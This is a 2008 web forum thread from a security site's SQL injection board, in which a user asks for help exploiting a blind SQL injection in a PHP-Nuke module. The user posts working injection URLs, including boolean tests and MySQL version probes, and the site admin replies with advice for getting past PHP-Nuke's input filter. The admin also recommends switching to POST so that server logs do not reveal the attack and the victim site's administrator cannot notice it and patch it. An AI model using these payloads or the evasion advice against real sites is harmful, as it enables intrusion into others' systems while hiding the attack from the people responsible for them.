|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 136
Members: 0
Total: 136
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Blind SQL inj PHP-NUKE ? |
|
Posted: Sat Apr 05, 2008 5:31 pm |
|
|
w0rm |
Active user |
|
|
Joined: Feb 22, 2008 |
Posts: 49 |
|
|
|
|
|
|
|
Hi all , i need help for Blind SQL injection Exploit in PHP-Nuke , i have find this exploit in a Module of PHP-Nuke
Code: | modules.php?name=Demo&op=demo&cid=2 and 1=1 |
index of website Normal
Code: | modules.php?name=Demo&op=demo&cid=2 and 1=2 |
the page is changed
SO , is a blind exploit i'am trying to know the version of Mysql :
Code: | modules.php?name=Demo&op=demo&cid=2 and substring(@@version,1,1)=4
modules.php?name=Demo&op=demo&cid=2 and substring(@@version,1,1)=5 |
i find this : ( The html tags you attempted to use are not allowed )
so ? i need a methode ... and thankx for all & sorry for my English ... |
|
|
|
|
|
|
|
|
Posted: Sat Apr 05, 2008 6:39 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
It's anti-hacking filter in phpnuke, in file "mainfile.php". Problem is in "(" and ")" symbols. I can strongly suggest to use POST method instead of GET. First, for POST there is less filtering and second, webserver logs will not reveal attack details or even attack presence. Right now, when you are using GET method, admin can see attack patterns on Apache logs and patch security hole(s) ASAP. Be more stealth |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|